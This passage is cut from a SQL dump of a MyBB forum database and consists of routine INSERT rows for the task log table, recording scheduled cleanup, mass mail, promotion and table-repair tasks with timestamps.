INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15804', '9', '1352544944', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15805', '3', '1352546900', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15806', '1', '1352546985', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15807', '7', '1352546991', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15808', '5', '1352546995', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15809', '9', '1352547007', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15810', '3', '1352547069', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15811', '9', '1352547880', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15812', '5', '1352547949', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15813', '9', '1352549578', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15814', '3', '1352550162', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15815', '1', '1352550177', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15816', '7', '1352550218', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15817', '5', '1352550223', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15818', '5', '1352550327', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15819', '9', '1352550337', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15820', '3', '1352550609', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15821', '9', '1352551306', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15822', '5', '1352551504', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15823', '9', '1352552960', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15824', '3', '1352553011', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15825', '1', '1352553478', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15826', '7', '1352553513', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15827', '5', '1352553519', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15828', '9', '1352553534', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15829', '5', '1352554196', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15830', '9', '1352554316', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15831', '3', '1352554361', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15832', '9', '1352554953', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15833', '5', '1352555109', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15834', '9', '1352557391', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15835', '3', '1352557475', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15836', '1', '1352557630', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15837', '7', '1352557947', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15838', '5', '1352558051', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15839', '9', '1352558215', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15840', '3', '1352558223', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15841', '9', '1352558611', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15842', '5', '1352559722', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15843', '9', '1352559845', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15844', '3', '1352560573', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15845', '1', '1352560583', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15846', '7', '1352560649', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15847', '5', '1352560655', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15848', '9', '1352560657', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15849', '5', '1352561646', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15850', '9', '1352561672', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15851', '3', '1352561677', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15852', '9', '1352562029', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15853', '5', '1352564139', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15854', '9', '1352566341', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15855', '3', '1352566343', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15856', '1', '1352566354', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15857', '7', '1352566358', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15858', '5', '1352566380', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15859', '9', '1352568138', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15860', '3', '1352568227', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15861', '1', '1352568232', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15862', '7', '1352568397', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15863', '5', '1352568467', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15864', '9', '1352570780', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15865', '3', '1352571016', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15866', '5', '1352571381', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15867', '1', '1352571397', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15868', '7', '1352571484', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15869', '9', '1352571499', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15870', '5', '1352571906', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15871', '9', '1352571923', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15872', '3', '1352572920', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15873', '9', '1352573510', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15874', '5', '1352573516', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15875', '9', '1352575341', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15876', '3', '1352575346', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15877', '1', '1352575363', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15878', '7', '1352575376', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15879', '5', '1352575401', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15880', '5', '1352575821', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15881', '9', '1352576042', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15882', '3', '1352576060', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15883', '9', '1352576411', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15884', '5', '1352577037', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15885', '9', '1352577391', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15886', '3', '1352577604', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15887', '1', '1352577686', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15888', '7', '1352577693', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15889', '5', '1352577904', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15890', '9', '1352578459', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15891', '5', '1352579173', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15892', '9', '1352579177', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15893', '3', '1352579676', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15894', '9', '1352580065', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15895', '5', '1352580327', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15896', '9', '1352580931', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15897', '3', '1352583371', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15898', '1', '1352583379', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15899', '7', '1352583406', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15900', '5', '1352583409', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15901', '9', '1352583415', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15902', '9', '1352583654', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15903', '5', '1352584740', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15904', '9', '1352585038', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15905', '3', '1352585050', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15906', '1', '1352585493', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15907', '7', '1352585510', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15908', '5', '1352586580', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15909', '9', '1352586586', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15910', '3', '1352586882', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15911', '9', '1352587434', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15912', '5', '1352587546', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15913', '9', '1352588274', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15914', '3', '1352588364', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15915', '1', '1352588486', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15916', '7', '1352588962', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15917', '5', '1352588971', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15918', '9', '1352589183', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15919', '5', '1352590291', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15920', '9', '1352590685', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15921', '3', '1352591045', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15922', '9', '1352591093', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15923', '5', '1352591112', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15924', '9', '1352592319', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15925', '3', '1352592328', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15926', '1', '1352592335', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15927', '2', '1352592340', 'The daily cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15928', '7', '1352592568', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15929', '11', '1352592702', 'The delayed moderation task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15930', '5', '1352592765', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15931', '9', '1352592787', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15932', '5', '1352593521', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15933', '9', '1352593561', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15934', '3', '1352593813', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15935', '9', '1352594477', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15936', '5', '1352594977', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15937', '9', '1352595752', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15938', '3', '1352595761', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15939', '1', '1352595767', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15940', '7', '1352595817', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15941', '5', '1352595918', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15942', '9', '1352596545', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15943', '5', '1352597356', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15944', '9', '1352597360', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15945', '3', '1352597464', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15946', '9', '1352598096', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15947', '5', '1352598390', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15948', '9', '1352599201', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15949', '3', '1352599214', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15950', '1', '1352599219', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15951', '7', '1352599225', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15952', '5', '1352600613', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15953', '9', '1352600640', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15954', '5', '1352600857', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15955', '9', '1352601476', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15956', '3', '1352602045', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15957', '9', '1352602602', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15958', '5', '1352602662', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15959', '3', '1352602913', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15960', '1', '1352602950', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15961', '7', '1352602960', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15962', '5', '1352603411', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15963', '9', '1352603419', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15964', '5', '1352604411', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15965', '9', '1352604420', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15966', '3', '1352605535', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15967', '9', '1352605814', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15968', '5', '1352605844', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15969', '9', '1352606243', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15970', '3', '1352607185', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15971', '1', '1352607187', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15972', '7', '1352607254', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15973', '5', '1352607270', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15974', '9', '1352607285', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15975', '5', '1352608161', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15976', '9', '1352608278', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15977', '3', '1352608416', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15978', '9', '1352609035', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15979', '5', '1352609212', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15980', '9', '1352609967', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15981', '3', '1352610287', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15982', '1', '1352610665', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15983', '7', '1352610695', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15984', '5', '1352610723', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15985', '9', '1352610853', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15986', '5', '1352611840', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15987', '9', '1352612894', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15988', '3', '1352613286', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15989', '5', '1352613348', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15990', '9', '1352614457', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15991', '3', '1352615067', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15992', '1', '1352615300', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15993', '7', '1352616187', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15994', '5', '1352617027', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15995', '9', '1352617327', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15996', '3', '1352617351', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15997', '1', '1352617529', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15998', '7', '1352617536', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, 